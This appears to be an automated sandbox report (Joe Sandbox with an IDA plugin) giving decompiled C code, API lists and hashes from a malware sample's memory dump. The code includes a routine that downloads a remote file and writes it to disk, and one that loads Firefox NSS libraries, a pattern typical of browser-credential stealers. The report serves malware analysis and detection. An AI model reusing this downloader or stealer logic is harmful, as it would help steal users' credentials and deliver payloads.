				_v72 = 0;
				_push(L"ROOT\\CIMV2");
				_push(_t50);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t50 + 0xc))))() < 0) {
					L5:
					_t53 = "Unknown";
				} else {
					__imp__CoSetProxyBlanket(_v72, 0xa, 0, 0, 3, 3, 0, 0);
					_t55 = _v72;
					_push( &_v80);
					_push(0);
					_push(0x20);
					_push(L"Select * From Win32_OperatingSystem");
					_v80 = 0;
					_t90 =  *_t55;
					_t89 =  *(_t90 + 0x50);
					_push(L"WQL");
					_push(_t55);
					if( *( *(_t90 + 0x50))() < 0) {
						goto L5;
					} else {
						_v76 = 0;
						_v88 = 0;
						_v48 = 0xf;
						_v52 = 0;
						_v68 = 0;
						_v8 = 1;
						_t57 = _v80;
						if(_t57 == 0) {
							goto L5;
						} else {
							_t89 =  &_v76;
							 *((intOrPtr*)( *((intOrPtr*)( *_t57 + 0x10))))(_t57, 0xffffffff, 1,  &_v76,  &_v88);
							if(_v88 == 0) {
								goto L5;
							} else {
								__imp__#8( &_v108);
								_v8 = 2;
								_t60 = _v76;
								 *((intOrPtr*)( *((intOrPtr*)( *_t60 + 0x10))))(_t60, L"InstallDate", 0,  &_v108, 0, 0);
								_t100 =  &_v116;
								E29DA3D50(_t100, _v100);
								FileTimeToSystemTime(_t100,  &_v40);
								_t101 = HeapAlloc(GetProcessHeap(), 0, 0x104);
								_t89 = _v40.wDay & 0x0000ffff;
								wsprintfA(_t101, "%d/%d/%d %d:%d:%d", _v40.wDay & 0x0000ffff, _v40.wMonth & 0x0000ffff, _v40.wYear & 0x0000ffff, _v40.wHour & 0x0000ffff, _v40.wMinute & 0x0000ffff, _v40.wSecond & 0x0000ffff);
								__imp__#9( &_v108);
								E29D89160( &_v68);
								_t53 = _t101;
							}
						}
					}
				}
				 *[fs:0x0] = _v16;
				_pop(_t97);
				_pop(_t99);
				_pop(_t74);
				return E29DADF46(_t53, _t74, _v24 ^ _t102, _t89, _t97, _t99);
			}








































                                        0x29da3e04
                                        0x29da3e09
                                        0x29da3e0b
                                        0x29da3e15
                                        0x29da3e1b
                                        0x29da3e22
                                        0x29da3e25
                                        0x29da3e36
                                        0x29da3e4d
                                        0x29da3e50
                                        0x29da3e56
                                        0x29da3e59
                                        0x29da3e5c
                                        0x29da3e5d
                                        0x29da3e5e
                                        0x29da3e5f
                                        0x29da3e60
                                        0x29da3e61
                                        0x29da3e62
                                        0x29da3e63
                                        0x29da3e68
                                        0x29da3e6d
                                        0x29da3e75
                                        0x29da3f94
                                        0x29da3f94
                                        0x29da3e7b
                                        0x29da3e89
                                        0x29da3e8f
                                        0x29da3e95
                                        0x29da3e96
                                        0x29da3e97
                                        0x29da3e99
                                        0x29da3e9e
                                        0x29da3ea1
                                        0x29da3ea3
                                        0x29da3ea6
                                        0x29da3eab
                                        0x29da3eb0
                                        0x00000000
                                        0x29da3eb6
                                        0x29da3eb6
                                        0x29da3eb9
                                        0x29da3ebc
                                        0x29da3ec3
                                        0x29da3ec6
                                        0x29da3ec9
                                        0x29da3ecd
                                        0x29da3ed2
                                        0x00000000
                                        0x29da3ed8
                                        0x29da3ede
                                        0x29da3eea
                                        0x29da3eef
                                        0x00000000
                                        0x29da3ef5
                                        0x29da3ef9
                                        0x29da3f05
                                        0x29da3f09
                                        0x29da3f18
                                        0x29da3f1e
                                        0x29da3f21
                                        0x29da3f30
                                        0x29da3f51
                                        0x29da3f62
                                        0x29da3f6f
                                        0x29da3f7c
                                        0x29da3f85
                                        0x29da3f8a
                                        0x29da3f8a
                                        0x29da3eef
                                        0x29da3ed2
                                        0x29da3eb0
                                        0x29da3f9c
                                        0x29da3fa4
                                        0x29da3fa5
                                        0x29da3fa6
                                        0x29da3fb4

                                        APIs
                                        • CoInitializeEx.OLE32(00000000,00000000,D9555F04,00000010,0000000F,00000000), ref: 29DA3E25
                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 29DA3E36
                                        • CoCreateInstance.OLE32(29DC54F0,00000000,00000001,29DC5420,?), ref: 29DA3E50
                                        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 29DA3E89
                                        • VariantInit.OLEAUT32(?), ref: 29DA3EF9
                                          • Part of subcall function 29DA3D50: CoCreateInstance.OLE32(29DC57A0,00000000,00000001,29DD09A4,?,00000010,00000000,?,29DA3F26,?), ref: 29DA3D6E
                                          • Part of subcall function 29DA3D50: SysAllocString.OLEAUT32(29DA3F26), ref: 29DA3D7C
                                          • Part of subcall function 29DA3D50: SysFreeString.OLEAUT32(29DA3F26), ref: 29DA3DCE
                                          • Part of subcall function 29DA3D50: SysFreeString.OLEAUT32(?), ref: 29DA3DD4
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 29DA3F30
                                        • GetProcessHeap.KERNEL32 ref: 29DA3F36
                                        • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 29DA3F43
                                        • wsprintfA.USER32 ref: 29DA3F6F
                                        • VariantClear.OLEAUT32(?), ref: 29DA3F7C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystemwsprintf
                                        • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$WQL
                                        • API String ID: 3748038148-271508173
                                        • Opcode ID: 216257aa41bb5928c837ade9a323ed24dc0b846422c251d5b1bbcbb0d71c20af
                                        • Instruction ID: dfd4a3d1ddb88e7b50e1d7f76cea645e6981e2becc4ee7e988ca893a8c284e47
                                        • Opcode Fuzzy Hash: 216257aa41bb5928c837ade9a323ed24dc0b846422c251d5b1bbcbb0d71c20af
                                        • Instruction Fuzzy Hash: 355124B2904259BFDB10DFA4CCC8EAEB7BCFB58704F508619F105AB284D674AD06DB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D97E40 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 134networkfilesleepCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 59%
                                        			E29D97E40(void* __ecx, CHAR* _a4) {
				signed int _v8;
				void _v264;
				void _v1288;
				long _v1292;
				void* _v1296;
				char* _v1300;
				long _v1304;
				CHAR* _v1308;
				long _v1312;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t26;
				void* _t36;
				long _t43;
				void* _t49;
				void* _t61;
				void* _t62;
				signed int _t63;

				_t26 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t26 ^ _t63;
				_t61 = 0;
				_t62 = __ecx;
				_v1308 = _a4;
				_v1300 = 0;
				_v1304 = 0x100;
				_t49 = InternetOpenA(0x29dcd617, 1, 0, 0, 0);
				if(_t49 != 0) {
					_push("https");
					_push(E29D97DC0(_t49, 0, __ecx));
					if( *0x29dd8550() == 0) {
						_v1300 = 1;
					}
					_v1296 = _t61;
					do {
						_push(0);
						if(_v1300 == 0) {
							_push(0x100);
						} else {
							_push(0x800100);
						}
						_t61 = InternetOpenUrlA(_t49, _t62, 0, 0, ??, ??);
						if(HttpQueryInfoA(_t61, 0x13,  &_v264,  &_v1304, 0) == 0) {
							goto L10;
						} else {
							_push("200");
							_push( &_v264);
							if( *0x29dd8550() != 0) {
								Sleep(0x3e8);
								goto L10;
							}
						}
						break;
						L10:
						_t36 = _v1296 + 1;
						_v1296 = _t36;
					} while (_t36 < 3);
					_t62 = CreateFileA(_v1308, 0x40000000, 3, 0, 2, 0x80, 0);
					if(InternetReadFile(_t61,  &_v1288, 0x400,  &_v1292) != 0) {
						do {
							_t43 = _v1292;
							if(_t43 == 0) {
								goto L15;
							} else {
								if(WriteFile(_t62,  &_v1288, _t43,  &_v1312, 0) != 0) {
									_t43 = _v1292;
									if(_t43 == _v1312) {
										goto L15;
									}
								}
							}
							goto L17;
							L15:
						} while (_t43 >= 0x400 && InternetReadFile(_t61,  &_v1288, 0x400,  &_v1292) != 0);
					}
					L17:
					_t57 =  &_v1288;
					E29DB5640( &_v1288, 0, 0x400);
					CloseHandle(_t62);
					InternetCloseHandle(_t61);
					_t29 = InternetCloseHandle(_t49);
				}
				return E29DADF46(_t29, _t49, _v8 ^ _t63, _t57, _t61, _t62);
			}






















                                        0x29d97e49
                                        0x29d97e50
                                        0x29d97e59
                                        0x29d97e65
                                        0x29d97e67
                                        0x29d97e6d
                                        0x29d97e73
                                        0x29d97e83
                                        0x29d97e87
                                        0x29d97e8d
                                        0x29d97e97
                                        0x29d97ea0
                                        0x29d97ea2
                                        0x29d97ea2
                                        0x29d97eac
                                        0x29d97eb2
                                        0x29d97eb9
                                        0x29d97ebb
                                        0x29d97ec4
                                        0x29d97ebd
                                        0x29d97ebd
                                        0x29d97ebd
                                        0x29d97ee5
                                        0x29d97ef2
                                        0x00000000
                                        0x29d97ef4
                                        0x29d97ef4
                                        0x29d97eff
                                        0x29d97f08
                                        0x29d97f0f
                                        0x00000000
                                        0x29d97f0f
                                        0x29d97f08
                                        0x00000000
                                        0x29d97f15
                                        0x29d97f1b
                                        0x29d97f1c
                                        0x29d97f22
                                        0x29d97f4d
                                        0x29d97f64
                                        0x29d97f66
                                        0x29d97f66
                                        0x29d97f6e
                                        0x00000000
                                        0x29d97f70
                                        0x29d97f8a
                                        0x29d97f8c
                                        0x29d97f98
                                        0x00000000
                                        0x00000000
                                        0x29d97f98
                                        0x29d97f8a
                                        0x00000000
                                        0x29d97f9a
                                        0x29d97f9a
                                        0x29d97f66
                                        0x29d97fbf
                                        0x29d97fc4
                                        0x29d97fcd
                                        0x29d97fd6
                                        0x29d97fdd
                                        0x29d97fe4
                                        0x29d97fe4
                                        0x29d97ffa

                                        APIs
                                        • InternetOpenA.WININET(29DCD617,00000001,00000000,00000000,00000000), ref: 29D97E7D
                                          • Part of subcall function 29D97DC0: _memset.LIBCMT ref: 29D97DDB
                                          • Part of subcall function 29D97DC0: _memset.LIBCMT ref: 29D97DE8
                                          • Part of subcall function 29D97DC0: lstrlenA.KERNEL32(00000000,10000000,?), ref: 29D97E0E
                                          • Part of subcall function 29D97DC0: InternetCrackUrlA.WININET(00000000,00000000), ref: 29D97E16
                                        • StrCmpCA.SHLWAPI(00000000,https), ref: 29D97E98
                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 29D97ECF
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 29D97EEA
                                        • StrCmpCA.SHLWAPI(?,200), ref: 29D97F00
                                        • Sleep.KERNEL32(000003E8), ref: 29D97F0F
                                        • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 29D97F40
                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 29D97F5C
                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 29D97F82
                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 29D97FB5
                                        • _memset.LIBCMT ref: 29D97FCD
                                        • CloseHandle.KERNEL32(00000000), ref: 29D97FD6
                                        • InternetCloseHandle.WININET(00000000), ref: 29D97FDD
                                        • InternetCloseHandle.WININET(00000000), ref: 29D97FE4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$File$CloseHandle_memset$OpenRead$CrackCreateHttpInfoQuerySleepWritelstrlen
                                        • String ID: 200$https
                                        • API String ID: 107165592-2945048398
                                        • Opcode ID: 6611cac664ba6226601336960de023f69e6f7fbc41452b1abace362989dc7724
                                        • Instruction ID: de3b98d16bea82bc0495d938741315ddccb7bb8e4b04986c5383d82fb63f1cd5
                                        • Opcode Fuzzy Hash: 6611cac664ba6226601336960de023f69e6f7fbc41452b1abace362989dc7724
                                        • Instruction Fuzzy Hash: C4418471650618ABE721AF61CC85FEF7778EF45B01F004498F609E7180EBB49A859F70
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DABB50 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 64stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,?,29DAC942,?,?), ref: 29DABB52
                                        • StrCmpCA.SHLWAPI(?,29DD0AF4,?,?), ref: 29DABB7D
                                        • StrCmpCA.SHLWAPI(?,.zip,?,?), ref: 29DABB91
                                        • StrCmpCA.SHLWAPI(?,.zoo,?,?), ref: 29DABBA1
                                        • StrCmpCA.SHLWAPI(?,.arc,?,?), ref: 29DABBB1
                                        • StrCmpCA.SHLWAPI(?,.lzh,?,?), ref: 29DABBC1
                                        • StrCmpCA.SHLWAPI(?,.arj,?,?), ref: 29DABBD1
                                        • StrCmpCA.SHLWAPI(?,.gz,?,?), ref: 29DABBE1
                                        • StrCmpCA.SHLWAPI(?,.tgz,?,?), ref: 29DABBF1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                        • API String ID: 1659193697-51310709
                                        • Opcode ID: c314af00ac9a7d4aac4057f5332085f624aeacb8f4d8ee39194fedde9f018f7f
                                        • Instruction ID: a8affcb61d0e1f9330a3e4872c7ffa16b08d2eb8e595cc906f055106b46a6398
                                        • Opcode Fuzzy Hash: c314af00ac9a7d4aac4057f5332085f624aeacb8f4d8ee39194fedde9f018f7f
                                        • Instruction Fuzzy Hash: 27112F33281D916697473F25AC48EEB3B58AF51A55781816CF480E180DEB1CC457B3B5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D936D0 Relevance: 27.3, APIs: 12, Strings: 6, Instructions: 342memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 79%
                                        			E29D936D0() {
				long _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				char _v48;
				intOrPtr _v56;
				long _v60;
				char _v76;
				long _v84;
				char _v380;
				long _v384;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t91;
				signed int _t92;
				intOrPtr* _t94;
				void* _t96;
				intOrPtr* _t100;
				intOrPtr* _t101;
				intOrPtr* _t108;
				intOrPtr* _t109;
				intOrPtr* _t114;
				intOrPtr* _t115;
				intOrPtr* _t122;
				intOrPtr* _t123;
				intOrPtr* _t130;
				intOrPtr* _t131;
				intOrPtr* _t136;
				intOrPtr* _t137;
				long _t150;
				void* _t151;
				intOrPtr _t158;
				void* _t196;
				void* _t198;
				void* _t199;
				intOrPtr* _t200;
				intOrPtr* _t201;
				intOrPtr* _t202;
				intOrPtr* _t203;
				intOrPtr* _t204;
				intOrPtr* _t205;
				signed int _t206;
				void* _t207;
				void* _t208;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t217;
				void* _t218;
				void* _t219;
				void* _t220;
				void* _t223;

				_push(0xffffffff);
				_push(E29DC4128);
				_push( *[fs:0x0]);
				_t208 = _t207 - 0x174;
				_t91 =  *0x29dd5664; // 0xd9555f04
				_t92 = _t91 ^ _t206;
				_v20 = _t92;
				_push(_t92);
				 *[fs:0x0] =  &_v16;
				_t180 =  *0x29dd8098; // 0x15a1f98
				_t150 = 0;
				_t94 = _t180;
				_v56 = 0xf;
				_v60 = 0;
				_v76 = 0;
				_t6 = _t94 + 1; // 0x15a1f99
				_t198 = _t6;
				do {
					_t158 =  *_t94;
					_t94 = _t94 + 1;
				} while (_t158 != 0);
				_t96 = E29D892C0( &_v76, _t180, _t94 - _t198);
				_v8 = 0;
				_t223 =  *0x29dd86f8 - _t150; // 0x0
				if(_t223 != 0) {
					L64:
					if(_v56 >= 0x10) {
						_push(_v76);
						_t96 = E29DADF3B();
					}
					 *[fs:0x0] = _v16;
					_pop(_t196);
					_pop(_t199);
					_pop(_t151);
					return E29DADF46(_t96, _t151, _v20 ^ _t206, _t180, _t196, _t199);
				} else {
					_t100 = E29D95460( &_v48,  &_v76, "vcruntime140.dll");
					_t210 = _t208 + 0xc;
					_v8 = 1;
					if( *((intOrPtr*)(_t100 + 0x14)) < 0x10) {
						_t200 = _t100;
					} else {
						_t200 =  *_t100;
					}
					_t101 =  *0x29dd82dc; // 0x0
					_v384 = _t150;
					if(_t101 != _t150) {
						if( *_t101 == 1) {
							 *0x29dd86b0 = E29D8DE50( &_v384,  &_v380,  *((intOrPtr*)(_t101 + 4)), "vcruntime140.dll");
							_t150 = 0;
						} else {
							 *0x29dd86b0 = 0x80000;
						}
					} else {
						 *0x29dd86b0 = 0x10000;
					}
					HeapAlloc(GetProcessHeap(), _t150, _v84);
					E29D8E4F0(_v84, _v384, _t200);
					_t211 = _t210 + 8;
					_v8 = _t150;
					if(_v28 >= 0x10) {
						_push(_v48);
						E29DADF3B();
						_t211 = _t211 + 4;
					}
					_t108 = E29D95460( &_v48,  &_v76, "softokn3.dll");
					_t212 = _t211 + 0xc;
					_v8 = 2;
					if( *((intOrPtr*)(_t108 + 0x14)) < 0x10) {
						_t201 = _t108;
					} else {
						_t201 =  *_t108;
					}
					_t109 =  *0x29dd82dc; // 0x0
					_v384 = _t150;
					if(_t109 != _t150) {
						if( *_t109 == 1) {
							 *0x29dd86b0 = E29D8DE50( &_v384,  &_v380,  *((intOrPtr*)(_t109 + 4)), "softokn3.dll");
							_t150 = 0;
						} else {
							 *0x29dd86b0 = 0x80000;
						}
					} else {
						 *0x29dd86b0 = 0x10000;
					}
					HeapAlloc(GetProcessHeap(), _t150, _v84);
					E29D8E4F0(_v384, _v384, _t201);
					_t213 = _t212 + 8;
					_v8 = _t150;
					if(_v28 >= 0x10) {
						_push(_v48);
						E29DADF3B();
						_t213 = _t213 + 4;
					}
					_t186 =  &_v48;
					_t114 = E29D95460( &_v48,  &_v76, "nss3.dll");
					_t214 = _t213 + 0xc;
					_v8 = 3;
					if( *((intOrPtr*)(_t114 + 0x14)) < 0x10) {
						_t202 = _t114;
					} else {
						_t202 =  *_t114;
					}
					_t115 =  *0x29dd82dc; // 0x0
					_v384 = _t150;
					if(_t115 != _t150) {
						if( *_t115 == 1) {
							_t186 =  *((intOrPtr*)(_t115 + 4));
							 *0x29dd86b0 = E29D8DE50( &_v384,  &_v380,  *((intOrPtr*)(_t115 + 4)), "nss3.dll");
							_t150 = 0;
						} else {
							 *0x29dd86b0 = 0x80000;
						}
					} else {
						 *0x29dd86b0 = 0x10000;
					}
					HeapAlloc(GetProcessHeap(), _t150, _v84);
					E29D8E4F0(_t186, _v384, _t202);
					_t215 = _t214 + 8;
					_v8 = _t150;
					if(_v28 >= 0x10) {
						_push(_v48);
						E29DADF3B();
						_t215 = _t215 + 4;
					}
					_t122 = E29D95460( &_v48,  &_v76, "msvcp140.dll");
					_t216 = _t215 + 0xc;
					_v8 = 4;
					if( *((intOrPtr*)(_t122 + 0x14)) < 0x10) {
						_t203 = _t122;
					} else {
						_t203 =  *_t122;
					}
					_t123 =  *0x29dd82dc; // 0x0
					_v384 = _t150;
					if(_t123 != _t150) {
						if( *_t123 == 1) {
							 *0x29dd86b0 = E29D8DE50( &_v384,  &_v380,  *((intOrPtr*)(_t123 + 4)), "msvcp140.dll");
							_t150 = 0;
						} else {
							 *0x29dd86b0 = 0x80000;
						}
					} else {
						 *0x29dd86b0 = 0x10000;
					}
					HeapAlloc(GetProcessHeap(), _t150, _v84);
					E29D8E4F0(_v84, _v384, _t203);
					_t217 = _t216 + 8;
					_v8 = _t150;
					if(_v28 >= 0x10) {
						_push(_v48);
						E29DADF3B();
						_t217 = _t217 + 4;
					}
					_t130 = E29D95460( &_v48,  &_v76, "mozglue.dll");
					_t218 = _t217 + 0xc;
					_v8 = 5;
					if( *((intOrPtr*)(_t130 + 0x14)) < 0x10) {
						_t204 = _t130;
					} else {
						_t204 =  *_t130;
					}
					_t131 =  *0x29dd82dc; // 0x0
					_v384 = _t150;
					if(_t131 != _t150) {
						if( *_t131 == 1) {
							 *0x29dd86b0 = E29D8DE50( &_v384,  &_v380,  *((intOrPtr*)(_t131 + 4)), "mozglue.dll");
							_t150 = 0;
						} else {
							 *0x29dd86b0 = 0x80000;
						}
					} else {
						 *0x29dd86b0 = 0x10000;
					}
					HeapAlloc(GetProcessHeap(), _t150, _v84);
					E29D8E4F0(_v384, _v384, _t204);
					_t219 = _t218 + 8;
					_v8 = _t150;
					if(_v28 >= 0x10) {
						_push(_v48);
						E29DADF3B();
						_t219 = _t219 + 4;
					}
					_t136 = E29D95460( &_v48,  &_v76, "freebl3.dll");
					_t220 = _t219 + 0xc;
					_v8 = 6;
					if( *((intOrPtr*)(_t136 + 0x14)) < 0x10) {
						_t205 = _t136;
					} else {
						_t205 =  *_t136;
					}
					_t137 =  *0x29dd82dc; // 0x0
					_v384 = _t150;
					if(_t137 != _t150) {
						if( *_t137 == 1) {
							_t180 =  *((intOrPtr*)(_t137 + 4));
							 *0x29dd86b0 = E29D8DE50( &_v384,  &_v380,  *((intOrPtr*)(_t137 + 4)), "freebl3.dll");
							_t150 = 0;
						} else {
							 *0x29dd86b0 = 0x80000;
						}
					} else {
						 *0x29dd86b0 = 0x10000;
					}
					HeapAlloc(GetProcessHeap(), _t150, _v84);
					_t96 = E29D8E4F0(_t180, _v384, _t205);
					_t208 = _t220 + 8;
					if(_v28 >= 0x10) {
						_t180 = _v48;
						_push(_v48);
						_t96 = E29DADF3B();
						_t208 = _t208 + 4;
					}
					 *0x29dd86f8 = 1;
					goto L64;
				}
			}




























































                                        0x29d936d3
                                        0x29d936d5
                                        0x29d936e0
                                        0x29d936e1
                                        0x29d936e7
                                        0x29d936ec
                                        0x29d936ee
                                        0x29d936f4
                                        0x29d936f8
                                        0x29d936fe
                                        0x29d93704
                                        0x29d93706
                                        0x29d93708
                                        0x29d9370f
                                        0x29d93712
                                        0x29d93715
                                        0x29d93715
                                        0x29d93718
                                        0x29d93718
                                        0x29d9371a
                                        0x29d9371b
                                        0x29d93726
                                        0x29d9372b
                                        0x29d93733
                                        0x29d93739
                                        0x29d93b2a
                                        0x29d93b2d
                                        0x29d93b32
                                        0x29d93b33
                                        0x29d93b38
                                        0x29d93b3e
                                        0x29d93b46
                                        0x29d93b47
                                        0x29d93b48
                                        0x29d93b56
                                        0x29d9373f
                                        0x29d9374c
                                        0x29d93751
                                        0x29d93754
                                        0x29d9375b
                                        0x29d93761
                                        0x29d9375d
                                        0x29d9375d
                                        0x29d9375d
                                        0x29d93763
                                        0x29d93768
                                        0x29d93770
                                        0x29d93781
                                        0x29d937a8
                                        0x29d937ad
                                        0x29d93783
                                        0x29d93783
                                        0x29d93783
                                        0x29d93772
                                        0x29d93772
                                        0x29d93772
                                        0x29d937bb
                                        0x29d937c9
                                        0x29d937ce
                                        0x29d937d1
                                        0x29d937d7
                                        0x29d937dc
                                        0x29d937dd
                                        0x29d937e2
                                        0x29d937e2
                                        0x29d937f2
                                        0x29d937f7
                                        0x29d937fa
                                        0x29d93801
                                        0x29d93807
                                        0x29d93803
                                        0x29d93803
                                        0x29d93803
                                        0x29d93809
                                        0x29d9380e
                                        0x29d93816
                                        0x29d93827
                                        0x29d9384e
                                        0x29d93853
                                        0x29d93829
                                        0x29d93829
                                        0x29d93829
                                        0x29d93818
                                        0x29d93818
                                        0x29d93818
                                        0x29d93861
                                        0x29d9386f
                                        0x29d93874
                                        0x29d93877
                                        0x29d9387d
                                        0x29d93882
                                        0x29d93883
                                        0x29d93888
                                        0x29d93888
                                        0x29d93894
                                        0x29d93898
                                        0x29d9389d
                                        0x29d938a0
                                        0x29d938a7
                                        0x29d938ad
                                        0x29d938a9
                                        0x29d938a9
                                        0x29d938a9
                                        0x29d938af
                                        0x29d938b4
                                        0x29d938bc
                                        0x29d938cd
                                        0x29d938db
                                        0x29d938f4
                                        0x29d938f9
                                        0x29d938cf
                                        0x29d938cf
                                        0x29d938cf
                                        0x29d938be
                                        0x29d938be
                                        0x29d938be
                                        0x29d93907
                                        0x29d93915
                                        0x29d9391a
                                        0x29d9391d
                                        0x29d93923
                                        0x29d93928
                                        0x29d93929
                                        0x29d9392e
                                        0x29d9392e
                                        0x29d9393e
                                        0x29d93943
                                        0x29d93946
                                        0x29d9394d
                                        0x29d93953
                                        0x29d9394f
                                        0x29d9394f
                                        0x29d9394f
                                        0x29d93955
                                        0x29d9395a
                                        0x29d93962
                                        0x29d93973
                                        0x29d9399a
                                        0x29d9399f
                                        0x29d93975
                                        0x29d93975
                                        0x29d93975
                                        0x29d93964
                                        0x29d93964
                                        0x29d93964
                                        0x29d939ad
                                        0x29d939bb
                                        0x29d939c0
                                        0x29d939c3
                                        0x29d939c9
                                        0x29d939ce
                                        0x29d939cf
                                        0x29d939d4
                                        0x29d939d4
                                        0x29d939e4
                                        0x29d939e9
                                        0x29d939ec
                                        0x29d939f3
                                        0x29d939f9
                                        0x29d939f5
                                        0x29d939f5
                                        0x29d939f5
                                        0x29d939fb
                                        0x29d93a00
                                        0x29d93a08
                                        0x29d93a19
                                        0x29d93a40
                                        0x29d93a45
                                        0x29d93a1b
                                        0x29d93a1b
                                        0x29d93a1b
                                        0x29d93a0a
                                        0x29d93a0a
                                        0x29d93a0a
                                        0x29d93a53
                                        0x29d93a61
                                        0x29d93a66
                                        0x29d93a69
                                        0x29d93a6f
                                        0x29d93a74
                                        0x29d93a75
                                        0x29d93a7a
                                        0x29d93a7a
                                        0x29d93a8a
                                        0x29d93a8f
                                        0x29d93a92
                                        0x29d93a99
                                        0x29d93a9f
                                        0x29d93a9b
                                        0x29d93a9b
                                        0x29d93a9b
                                        0x29d93aa1
                                        0x29d93aa6
                                        0x29d93aae
                                        0x29d93abf
                                        0x29d93acd
                                        0x29d93ae6
                                        0x29d93aeb
                                        0x29d93ac1
                                        0x29d93ac1
                                        0x29d93ac1
                                        0x29d93ab0
                                        0x29d93ab0
                                        0x29d93ab0
                                        0x29d93af9
                                        0x29d93b07
                                        0x29d93b0c
                                        0x29d93b12
                                        0x29d93b14
                                        0x29d93b17
                                        0x29d93b18
                                        0x29d93b1d
                                        0x29d93b1d
                                        0x29d93b20
                                        0x00000000
                                        0x29d93b20

                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 29D937B4
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D937BB
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 29D9385A
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D93861
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 29D93900
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D93907
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 29D939A6
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D939AD
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 29D93A4C
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D93A53
                                          • Part of subcall function 29D8DE50: _memset.LIBCMT ref: 29D8DEB4
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 29D93AF2
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D93AF9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocProcess$_memset
                                        • String ID: freebl3.dll$mozglue.dll$msvcp140.dll$nss3.dll$softokn3.dll$vcruntime140.dll
                                        • API String ID: 2726902320-1377252038
                                        • Opcode ID: 3a91c341b65c9d1877077539fb8293640dbc606a351a856cab48c10ddbf246f4
                                        • Instruction ID: d86c429d2fb7a98f49122360157166e28af913a9b31d8db7834603f04f5a7bd1
                                        • Opcode Fuzzy Hash: 3a91c341b65c9d1877077539fb8293640dbc606a351a856cab48c10ddbf246f4
                                        • Instruction Fuzzy Hash: 3ED1C1B2D14284EFDB01EFA4D884ACEBBB4BF19744F00C1ADD50967601D735A94AEFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D9F960 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 112libraryloaderstringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 94%
                                        			E29D9F960(void* __ebx, void* __edi) {
				signed int _v8;
				char _v5008;
				void* __esi;
				signed int _t12;
				CHAR* _t25;
				struct HINSTANCE__* _t26;
				_Unknown_base(*)()* _t29;
				struct HINSTANCE__* _t30;
				_Unknown_base(*)()* _t31;
				_Unknown_base(*)()* _t32;
				CHAR* _t33;
				_Unknown_base(*)()* _t34;
				struct HINSTANCE__* _t35;
				_Unknown_base(*)()* _t36;
				void* _t38;
				CHAR* _t45;
				CHAR* _t46;
				struct HINSTANCE__* _t47;
				CHAR* _t48;
				CHAR* _t51;
				struct HINSTANCE__* _t52;
				CHAR* _t53;
				void* _t54;
				CHAR* _t55;
				signed int _t56;

				_t54 = __edi;
				_t38 = __ebx;
				E29DBCDB0(0x138c);
